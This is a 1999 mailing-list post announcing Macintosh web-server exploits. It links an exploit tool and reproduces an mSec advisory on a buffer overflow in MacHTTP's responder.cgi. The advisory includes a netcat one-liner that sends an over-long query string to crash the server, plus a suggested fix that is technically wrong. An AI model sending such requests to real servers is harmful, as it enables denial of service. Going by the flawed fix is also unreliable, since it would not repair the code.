Date: Fri, 16 Apr 1999 14:30:08 PDT
From: Freaky <freaky@mail.staticusers.net>
To: packetstorm@genocide2600.com
Subject: Macintosh HTTP Server Vulns

Hey Hey this is Freak from Freaks Macintosh Archives:
http://freaky.staticusers.net/

People are finally exploiting shit for the mac and noticing Denial of Service attacks here some listed below:

Shilo v1.0b (macos)
A Program that will exploit the buffer overflow in the responder.cgi on MacHTTP Servers. As always, The Source code to the
program is available. by epic of mSec
To download the exploit txt:http://freaky.staticusers.net/attack/responder-cgi.html

To download the mac product:
http://freaky.staticusers.net/attack/shilov1.0.sit

to goto the creators site:
mSec
http://www.msec.net/ 


----------[ http://freaky.staticusers.net/attack/responder-cgi.html ]----------

             ___________________________
            /        /        /        /\
     ______/    ____/    ____/        / /
    /     /        /        /    ____/ /
   /     /____    /    ____/        / / 
  / / / /        /        /        / /
 /_/_/_/________/________/________/ /
 \_____\________\________\________\/
 / . ../Macintosh  Security/.. .  /
/________________________________/
Presents:

Responder.cgi Vulnerability
Written by Epic, A Member of mSec <epic@msec.net>
Released 4/9/99 

Responder.cgi, a public domain 'C' shell for MacHTTP CGI Servers contains a buffer overflow that when exploited, will cause the server it is run on to freeze. You
are at risk if your responder.cgi file contains the line of code: 

char PostArg_Search[256]; 

which is the QUERY_STRING, Since it only allows upto 256 characters after ?, the server will crash if 257+ characters are requested. 

Exploit Example: (nc is netcat from avian.org)
$ echo "GET /cgi-bin/responder.cgi?xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx" | nc machttp-server.com 80 

Possible Workaround:
Remove responder.cgi from your /cgi-bin/ or change
char PostArg_Search[256]; to
char PostArg_Search; 

Epic <epic@msec.net>
http://www.msec.net
hotline://msec.net